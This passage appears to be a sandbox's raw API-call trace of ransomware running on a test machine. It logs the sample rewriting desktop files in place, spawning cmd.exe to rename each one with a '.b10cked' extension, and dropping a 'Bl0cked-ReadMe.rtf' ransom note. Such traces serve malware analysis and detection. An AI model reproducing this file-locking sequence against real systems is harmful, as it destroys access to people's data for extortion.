lpNumberOfBytesRead=0x12ec08*=0x520e, lpOverlapped=0x0) returned 1 [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0223.993] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x520e, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x520e, lpOverlapped=0x0) returned 1 [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-21006, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5210 [0223.993] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x520e, lpNumberOfBytesRead=0x12ec08, 
lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x520e, lpOverlapped=0x0) returned 1 [0223.994] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-21006, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5210 [0223.994] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x520e, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x520e, lpOverlapped=0x0) returned 1 [0223.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WtCCLcHrwK.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0223.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WtCCLcHrwK.wav", cchWideChar=14, lpMultiByteStr=0x131322c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WtCCLcHrwK.wav", lpUsedDefaultChar=0x0) returned 14 [0223.998] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xa41e [0223.998] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0223.998] CloseHandle (hObject=0x1b4) returned 1 [0223.999] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV") returned 0x2a [0223.999] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\") returned 0x1e [0224.000] CreateProcessW (in: lpApplicationName=0x0, 
lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x15c, dwThreadId=0xee4)) returned 1 [0224.001] CloseHandle (hObject=0x120) returned 1 [0224.001] CloseHandle (hObject=0x1b4) returned 1 [0224.001] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\") returned 0x1e [0224.001] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", cchLength=0x2e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\") returned 0x2e [0224.001] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\", cchCount1=30, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\", cchCount2=46) returned 1 [0224.001] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\") returned 0x1e [0224.001] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0224.001] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\", cchCount1=30, 
lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0224.001] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0224.002] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0224.002] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0224.002] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\") returned 0x1e [0224.002] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0224.002] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0224.002] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"", 
lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x128, dwThreadId=0x12c)) returned 1 [0224.007] CloseHandle (hObject=0x120) returned 1 [0224.007] CloseHandle (hObject=0x1b4) returned 1 [0224.007] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bl0cked-readme.rtf")) returned 0x20 [0224.007] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0224.007] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0224.007] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0224.007] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.008] ReleaseMutex (hMutex=0xf8) returned 1 [0224.008] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.008] ReleaseMutex (hMutex=0xf8) returned 1 [0224.008] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.008] ReleaseMutex (hMutex=0xf8) returned 1 [0224.008] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.008] ReleaseMutex (hMutex=0xf8) returned 1 [0224.008] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gcap-7-i61tx.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0224.008] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.008] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x567d [0224.008] SetFilePointer (in: hFile=0x1b4, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.008] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28079839232) returned 1 [0224.009] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.054] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x567d [0224.054] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.054] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.054] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x567d [0224.054] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.054] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x567d [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x567d [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x567d [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x567d [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x567d [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x567d [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x567d [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x5195 [0224.055] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0224.056] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0224.056] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x567d [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x567d [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0224.057] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x2b3d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x2b3d, lpOverlapped=0x0) returned 1 [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0224.057] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x2b3d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x2b3d, lpOverlapped=0x0) returned 1 [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-11069, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x2b40 [0224.057] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x2b3d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x2b3d, lpOverlapped=0x0) returned 1 [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-11069, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x2b40 
[0224.057] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x2b3d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x2b3d, lpOverlapped=0x0) returned 1 [0224.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gcAp-7-i61tX.bmp", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0224.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gcAp-7-i61tX.bmp", cchWideChar=16, lpMultiByteStr=0x13286a4, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gcAp-7-i61tX.bmp", lpUsedDefaultChar=0x0) returned 16 [0224.061] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x567d [0224.061] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0224.062] CloseHandle (hObject=0x1b4) returned 1 [0224.062] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP") returned 0x25 [0224.063] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0224.063] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, 
lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xeac, dwThreadId=0x6fc)) returned 1 [0224.064] CloseHandle (hObject=0x120) returned 1 [0224.064] CloseHandle (hObject=0x1b4) returned 1 [0224.064] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0224.064] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\") returned 0x1e [0224.065] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\", cchCount2=30) returned 1 [0224.065] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0224.065] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0224.065] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0224.065] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.065] ReleaseMutex (hMutex=0xf8) returned 1 [0224.065] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.065] ReleaseMutex (hMutex=0xf8) returned 1 [0224.065] WaitForSingleObject (hHandle=0xf8, 
dwMilliseconds=0xffffffff) returned 0x0 [0224.065] ReleaseMutex (hMutex=0xf8) returned 1 [0224.065] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.065] ReleaseMutex (hMutex=0xf8) returned 1 [0224.065] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf" (normalized: "c:\\users\\eebsym5\\desktop\\kawgr8umxculrfza.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8d4 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.065] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28085439913) returned 1 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8d4 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
